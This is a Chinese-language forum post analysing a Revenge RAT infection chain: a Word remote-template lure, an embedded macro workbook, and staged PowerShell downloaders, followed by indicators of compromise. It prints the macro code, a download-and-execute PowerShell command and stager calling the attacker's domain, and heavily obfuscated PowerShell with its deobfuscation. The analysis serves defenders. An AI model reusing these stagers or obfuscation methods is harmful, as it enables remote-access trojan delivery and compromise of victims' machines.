• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Revenge RAT加载器分析(word远程模板加载)


This Wind

Recommended Posts

参考链接:https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america
VT查杀

g6Qjoj.png

初始文件

g6Q7SP.png

方式:office vba远程模板加载

g6QzYn.png

随机加载http://azulviagens.online/1-9.docx将下载并执行其中一个模板。
每个文件都具有相同的内容(相同的SHA-256:338b2d8d76f4028bfbd177127371b2509971606553d606c534316dc40cfa8fb9)

g6lClV.png

模板文件

模板文件(“ 1.docx” …“ 9x.docx”)遵循图4(如下所示)所示的结构。结构中的settings.xml具有指向XLSM文件的“目标”字段,该字段位于DOCX文件结构的“嵌入”目录中。XLSM文件“ Microsoft_Excel_Macro-Enabled_Worksheet.xlsm”到“ Microsoft_Excel_Macro-Enabled_Worksheet9.xlsm”具有相同的内容(相同的SHA-256:32f1a502126b1932e1def04b98d8be235c8d25ef7268f8cb35d460cd073a88b2)。当Microsoft Word执行模板文件(“ 1.docx” …“ 9x.docx”)时,它将执行XLSM文件之一(“ Microsoft_Excel_Macro-Enabled_Worksheet.xlsm”到“ Microsoft_Excel_Macro-Enabled_Worksheet9.xlsm”)

g6ltfI.png

docx模板中的XLSM文件

g6la1P.png

word/embeddings目录下任意一个xlsm文件

g6lykj.png

xlsm文件

该结构在“ VBAProject.bin”文件中包含宏。以下屏幕快照显示了包含宏的流。olevba提取宏

Dim Program As String, TaskID As Double
Program = UserForm1.Image1.ControlTipText + UserForm1.Frame1.Tag + UserForm1.TabStrip1.ControlTipText + UserForm1.ScrollBar1.Tag
Program01 = UserForm2.Image1.Tag + UserForm2.Frame1.ControlTipText


On Error Resume Next
        AppActivate "UserForm1"
If Err <> 0 Then
                Err = 0
TaskID = Shell(Program, 0) //PowerShell  -ex Bypass -nOp -w 1 iex(iwr('http://azulviagens.online/A.txt'))
TaskID01 = Shell(Program01, 0) //taskkill  /f /im WINWORD.EXE


            If Err <> 0 Then MsgBox "Can't start " & Program
End If
End Sub
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
g6lXjK.png

UserForm1.Image1.ControlTipText olevba没看到,由于是shell函数执行的程序。火绒剑监控得到运行的内容

g6lvnO.png
g6lzHe.png


(调用powershell远程下载执行)

g61C4A.png


(杀掉进程WINWORD.exe)

http://azulviagens.online/A.txt在复现的时候已经失效了,根据原文章的图如下

$ProcName="index.vbs"
$WebFile="http://azulviagens.online/index.mp3"
C'l'e'a'r'-'H'o's't'
(N'e'W-'O'b'j'e'c't' S'y's't'e'm'.'N'e't'.'W'e'b'C'l'ient).DownloadFile($WebFile,"$env:APPDATA\$ProcName") #保存在C:\Users\<Username>\AppData\Roaming\index.vbs
S't'a'r't'-'P'r'o'c'e's's ("$env:APPDATA\$ProcName") #运行C:\Users\<Username>\AppData\Roaming\index.vbs
  • 1
  • 2
  • 3
  • 4
  • 5

最后运行index.vbs然后index.vbs远程下载/1.txt保存在Opera.vbs然后运行Opera.vbs

g61a59.png

最后是远程下载Opera.ps1并执行,ps1内容如下
重度混淆(

g61081.png

经过手动解密混淆,过程如下

# Decode 1
$a=iex  (  [CHar]36+[CHar]101  +[CHar]107+[CHar]108+[CHar]116+  [CHar]107+[CHar]116+  [CHar]101  +[CHar]107  +[CHar]100  +  [CHar]107+[CHar]113+  [CHar]106  +  [CHar]102+[CHar]100+[CHar]107  +[CHar]102  +  [CHar]100+[CHar]107+[CHar]102  +[CHar]107  +  [CHar]100  +[CHar]102+[CHar]107  +[CHar]115+  [CHar]100  +[CHar]107+  [CHar]115  +  [CHar]100  +[CHar]107+  [CHar]118  +  [CHar]99  +[CHar]107  +[CHar]107+  [CHar]101  +  [CHar]114  +[CHar]107+[CHar]101  +  [CHar]119  +  [CHar]116  +  [CHar]101  +  [CHar]107+  [CHar]114  +  [CHar]116+  [CHar]101+[CHar]107  +[CHar]121  +  [CHar]101  +  [CHar]107  +  [CHar]119  +[CHar]48  +[CHar]48  +  [CHar]48+  [CHar]48+  [CHar]61+[CHar]45+[CHar]74  +[CHar]111+  [CHar]105+  [CHar]110  +  [CHar]32+  [CHar]40  +[CHar]40+[CHar]49+  [CHar]49  +[CHar]49+[CHar]44  +  [CHar]32  +[CHar]49+[CHar]48+[CHar]53+  [CHar]44+[CHar]32+[CHar]49  +[CHar]51+  [CHar]48+  [CHar]41+  [CHar]124+  [CHar]32  +[CHar]70+[CHar]111+[CHar]114  +[CHar]69+  [CHar]97  +  [CHar]99  +  [CHar]104  +[CHar]45+[CHar]79+  [CHar]98+  [CHar]106+[CHar]101+[CHar]99  +  [CHar]116  +[CHar]32  +[CHar]123  +[CHar]40+[CHar]32+[CHar]91  +  [CHar]67  +[CHar]111+  [CHar]110+[CHar]118+  [CHar]101+[CHar]114+  [CHar]116  +[CHar]93+[CHar]58  +[CHar]58+  [CHar]84  +  [CHar]111+  [CHar]73  +  [CHar]110+  [CHar]116+[CHar]49+  [CHar]54  +[CHar]40  +[CHar]40+[CHar]91  +  [CHar]83+[CHar]116+  [CHar]114  +  [CHar]105+  [CHar]110  +  [CHar]103+[CHar]93+  [CHar]36+  [CHar]95+[CHar]32  +  [CHar]41+  [CHar]44  +  [CHar]32  +  [CHar]56+  [CHar]41+[CHar]32+[CHar]45+[CHar]65  +  [CHar]115+  [CHar]91+[CHar]67  +[CHar]104  +  [CHar]97  +[CHar]114+[CHar]93+[CHar]41+  [CHar]125  +[CHar]41  +[CHar]59  +[CHar]115+[CHar]97  +  [CHar]108+[CHar]32+  [CHar]103  +  [CHar]32+  [CHar]36  +[CHar]101  +  [CHar]107  +[CHar]108+  [CHar]116+  [CHar]107+[CHar]116+[CHar]101  +  [CHar]107  +[CHar]100  +[CHar]107  +  [CHar]113  +[CHar]106+  [CHar]102  +  [CHar]100+[CHar]107  +[CHar]102  +[CHar]100+[CHar]107+[CHar]102+[CHar]107  +[CHar]100  +  [CHar]102  +[CHar]107+  [CHar]115  +  [CHar]100+  [CHar]107  +[CHar]115+  [CHar]100+  [CHar]107  +  [CHar]118  +  [CHar]99  +[CHar]107  +  [CHar]107  +[CHar]101  +  [CHar]114  +  [CHar]107+  [CHar]101+  [CHar]119+  [CHar]116+[CHar]101+  [CHar]107  +  [CHar]114  +  [CHar]116+  [CHar]101  +[CHar]107  +[CHar]121  +[CHar]101  +  [CHar]107  +  [CHar]119+[CHar]48  +[CHar]48+  [CHar]48+[CHar]48  )




# Decode 2
$ekltktekdkqjfdkfdkfkdfksdksdkvckkerkewtekrtekyekw0000=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal g $ekltktekdkqjfdkfdkfkdfksdksdkvckkerkewtekrtekyekw0000 #sal为set-alias变量缩写


# Decode 3
iex(  [CHar]70+  [CHar]117  +  [CHar]110  +  [CHar]99+  [CHar]116+  [CHar]105  +  [CHar]111+  [CHar]110  +  [CHar]32  +  [CHar]109+  [CHar]97+  [CHar]120+[CHar]100  +[CHar]111+[CHar]111  +[CHar]111  +[CHar]109  +[CHar]32+  [CHar]123+[CHar]13  +[CHar]10+[CHar]32+  [CHar]13+  [CHar]10  +[CHar]32  +[CHar]32+  [CHar]32+[CHar]32  +  [CHar]91  +  [CHar]67+  [CHar]109  +[CHar]100+[CHar]108+  [CHar]101  +  [CHar]116+[CHar]66+[CHar]105+  [CHar]110  +[CHar]100  +[CHar]105+  [CHar]110  +  [CHar]103  +  [CHar]40  +[CHar]41  +  [CHar]93+  [CHar]13  +  [CHar]10  +[CHar]32+  [CHar]32  +  [CHar]32  +  [CHar]32  +[CHar]91  +[CHar]79  +[CHar]117  +[CHar]116+  [CHar]112  +[CHar]117  +[CHar]116  +  [CHar]84+  [CHar]121+  [CHar]112+[CHar]101+  [CHar]40+  [CHar]91  +[CHar]98+  [CHar]121  +  [CHar]116+[CHar]101+[CHar]91  +  [CHar]93+[CHar]93  +[CHar]41+  [CHar]93  +[CHar]13  +  [CHar]10+  [CHar]32+  [CHar]32+  [CHar]32  +  [CHar]32  +[CHar]112+[CHar]97  +[CHar]114  +[CHar]97  +[CHar]109  +[CHar]40  +  [CHar]13  +  [CHar]10  +  [CHar]32+  [CHar]32+  [CHar]32+  [CHar]32+[CHar]32  +[CHar]32+[CHar]32  +[CHar]32  +  [CHar]91  +  [CHar]80+[CHar]97+  [CHar]114  +  [CHar]97  +[CHar]109+[CHar]101+  [CHar]116  +[CHar]101  +  [CHar]114+  [CHar]40+[CHar]77+  [CHar]97  +[CHar]110  +[CHar]100+  [CHar]97+[CHar]116  +[CHar]111  +  [CHar]114  +[CHar]121  +[CHar]61+[CHar]36+  [CHar]116+  [CHar]114+[CHar]117+[CHar]101  +  [CHar]41+[CHar]93  +[CHar]32  +  [CHar]91+  [CHar]83  +  [CHar]116  +[CHar]114+[CHar]105  +[CHar]110+[CHar]103  +  [CHar]93+  [CHar]36+[CHar]122+  [CHar]88+[CHar]97+[CHar]87  +  [CHar]86  +  [CHar]80+[CHar]105+  [CHar]13  +[CHar]10  +  [CHar]32  +  [CHar]32  +  [CHar]32+  [CHar]32+  [CHar]41+[CHar]13  +[CHar]10  +[CHar]32+[CHar]32  +  [CHar]32+[CHar]32  +[CHar]36+[CHar]72+[CHar]116  +[CHar]116+[CHar]108  +[CHar]100+  [CHar]120  +[CHar]120  +  [CHar]49+  [CHar]115+  [CHar]49+  [CHar]115  +[CHar]51  +  [CHar]100+  [CHar]52  +  [CHar]102  +  [CHar]53+[CHar]118+  [CHar]53  +  [CHar]32  +  [CHar]61+[CHar]32  +  [CHar]78  +  [CHar]101  +[CHar]119  +[CHar]45+  [CHar]79  +  [CHar]98  +  [CHar]106  +[CHar]101  +  [CHar]99  +[CHar]116+  [CHar]32+[CHar]45+[CHar]84+  [CHar]121  +[CHar]112  +  [CHar]101  +  [CHar]78  +  [CHar]97+[CHar]109+  [CHar]101+  [CHar]32  +[CHar]98+[CHar]121+[CHar]116+[CHar]101+[CHar]91+[CHar]93  +  [CHar]32  +[CHar]45  +  [CHar]65  +[CHar]114+  [CHar]103+[CHar]117+  [CHar]109  +  [CHar]101+[CHar]110  +  [CHar]116+[CHar]76  +[CHar]105+[CHar]115+[CHar]116  +[CHar]32+[CHar]40  +  [CHar]36  +[CHar]122  +[CHar]88+  [CHar]97  +  [CHar]87+[CHar]86+  [CHar]80+  [CHar]105+  [CHar]46  +[CHar]76  +  [CHar]101+[CHar]110+  [CHar]103  +[CHar]116+  [CHar]104  +  [CHar]32  +[CHar]47  +  [CHar]32+  [CHar]50+  [CHar]41  +  [CHar]13  +  [CHar]10+  [CHar]32  +[CHar]32+[CHar]32  +[CHar]32+  [CHar]102+  [CHar]111  +  [CHar]114  +[CHar]32+  [CHar]40+[CHar]36  +[CHar]105  +[CHar]32  +  [CHar]61  +[CHar]32  +  [CHar]48  +  [CHar]59  +[CHar]32+  [CHar]36  +  [CHar]105  +[CHar]32+  [CHar]45+[CHar]108+[CHar]116  +[CHar]32  +  [CHar]36+[CHar]122+  [CHar]88  +  [CHar]97  +  [CHar]87+  [CHar]86+  [CHar]80  +  [CHar]105+  [CHar]46  +[CHar]76  +  [CHar]101  +[CHar]110  +[CHar]103  +[CHar]116  +[CHar]104+[CHar]59+  [CHar]32+  [CHar]36+  [CHar]105+  [CHar]32+[CHar]43  +[CHar]61+[CHar]32  +[CHar]50  +  [CHar]41  +[CHar]32+[CHar]123+  [CHar]13  +[CHar]10+  [CHar]32  +  [CHar]32+[CHar]32+[CHar]32  +[CHar]32  +[CHar]32  +  [CHar]32  +  [CHar]32  +[CHar]36  +  [CHar]72+[CHar]116+[CHar]116  +[CHar]108+  [CHar]100+  [CHar]120+  [CHar]120  +[CHar]49+  [CHar]115+  [CHar]49  +[CHar]115+  [CHar]51  +  [CHar]100+  [CHar]52+[CHar]102  +[CHar]53+  [CHar]118+[CHar]53  +  [CHar]91+[CHar]36  +  [CHar]105+  [CHar]32+  [CHar]47  +[CHar]32+[CHar]50  +[CHar]93  +[CHar]32+  [CHar]61+[CHar]32+[CHar]91  +[CHar]67+  [CHar]111+  [CHar]110  +[CHar]118  +  [CHar]101+[CHar]114+[CHar]116+[CHar]93  +  [CHar]58+[CHar]58  +  [CHar]84  +  [CHar]111  +[CHar]66+[CHar]121  +[CHar]116+[CHar]101+[CHar]40+  [CHar]36  +  [CHar]122  +  [CHar]88  +[CHar]97  +[CHar]87+  [CHar]86  +  [CHar]80+[CHar]105+[CHar]46  +  [CHar]83+  [CHar]117  +  [CHar]98  +[CHar]115  +[CHar]116  +  [CHar]114+  [CHar]105  +[CHar]110  +[CHar]103  +  [CHar]40+  [CHar]36  +  [CHar]105  +[CHar]44+  [CHar]32  +[CHar]50+  [CHar]41+[CHar]44  +[CHar]32  +  [CHar]49  +[CHar]54  +[CHar]41+  [CHar]13  +[CHar]10  +[CHar]32  +  [CHar]32+[CHar]32+[CHar]32  +  [CHar]125  +[CHar]13+  [CHar]10  +  [CHar]13+  [CHar]10+  [CHar]32  +  [CHar]32+[CHar]32  +[CHar]32  +[CHar]114  +  [CHar]101  +[CHar]116+  [CHar]117+[CHar]114+  [CHar]110+[CHar]32+  [CHar]91+  [CHar]98+  [CHar]121  +[CHar]116+  [CHar]101+[CHar]91  +[CHar]93+  [CHar]93  +  [CHar]36+[CHar]72+[CHar]116  +  [CHar]116+  [CHar]108+[CHar]100+[CHar]120  +[CHar]120+[CHar]49+  [CHar]115+  [CHar]49  +[CHar]115+[CHar]51+  [CHar]100+  [CHar]52+  [CHar]102+  [CHar]53+  [CHar]118+  [CHar]53+[CHar]13  +[CHar]10  +  [CHar]125  )




# Decode 4
Function maxdooom {


    [CmdletBinding()]
    [OutputType([byte[]])]
    param(
        [Parameter(Mandatory=$true)] [String]$zXaWVPi
    )
    $Httldxx1s1s3d4f5v5 = New-Object -TypeName byte[] -ArgumentList ($zXaWVPi.Length / 2)
    for ($i = 0; $i -lt $zXaWVPi.Length; $i += 2) {
        $Httldxx1s1s3d4f5v5[$i / 2] = [Convert]::ToByte($zXaWVPi.Substring($i, 2), 16)
    }


    return [byte[]]$Httldxx1s1s3d4f5v5
}


${\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`}  -> IEX
${!!!} -> IEX
&( ([sTRIng]$vERbOsepreFERENcE)[1,3]+'x'-jOIN'') -> IEX
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38

第一行的混淆最终结果是这样的

g61h8I.png

第四行混淆

g61qaQ.png

第七行混淆

g61jGn.png
g63prT.png

最终解密得到后的ps1

sal g $ekltktekdkqjfdkfdkfkdfksdksdkvckkerkewtekrtekyekw0000
[String]$CXCXxcxsderrewrttyrghbvvbc="<BIN_HEX>"
Function maxdooom {
    [CmdletBinding()]
    [OutputType([byte[]])]
    param(
        [Parameter(Mandatory=$true)] [String]$zXaWVPi
    )
    $Httldxx1s1s3d4f5v5 = New-Object -TypeName byte[] -ArgumentList ($zXaWVPi.Length / 2)
    for ($i = 0; $i -lt $zXaWVPi.Length; $i += 2) {
        $Httldxx1s1s3d4f5v5[$i / 2] = [Convert]::ToByte($zXaWVPi.Substring($i, 2), 16)
    }
    return [byte[]]$Httldxx1s1s3d4f5v5
}

[String]$Cmder2021="<BIN_HEX>"
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16

.NET文件

$CXCXxcxsderrewrttyrghbvvbc变量存的PE是Revenge RAT,上次就分析过这里了略过,分析链接:https://422926799.github.io/posts/43591be7.html

g63Zxx.png
g63mM6.png

$Cmder2021变量里的存的PE则是读取资源文件内存加载

g63nsK.png
g63uqO.png
g63MZD.png
g63GRI.png

资源文件

g63Jzt.png

URLS

http://azulviagens.online
Cdtpitbull.hopto.org

HASHES

Initial attack document
91611ac2268d9bf7b7cb2e71976c630f6b4bfdbb68774420bf01fd1493ed28c7

Initial attack document
77d6651de47bff4c24fc26fa018ea648b0e14e276e8240fae6b1724b8638c46a

1.docx(template)
338b2d8d76f4028bfbd177127371b2509971606553d606c534316dc40cfa8fb9

Microsoft_Excel_Macro-Enabled_Worksheet.xlsm
32f1a502126b1932e1def04b98d8be235c8d25ef7268f8cb35d460cd073a88b2

A.txt
4b65e5785692950f8100b22f2827d65ba93e99dd717eb444af035e96fcd84763

opera.ps1
03f5ff9b6a6b24f76799cc15fe3f1fbf1ca9d6dda30a4154125ed5dd5834290c

Revenge RAT
73f113a6146224c4a1f92f89055922a28322787c108e30000a0a420fa46ed9e2

https://422926799.github.io/posts/ac1cf40.html

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now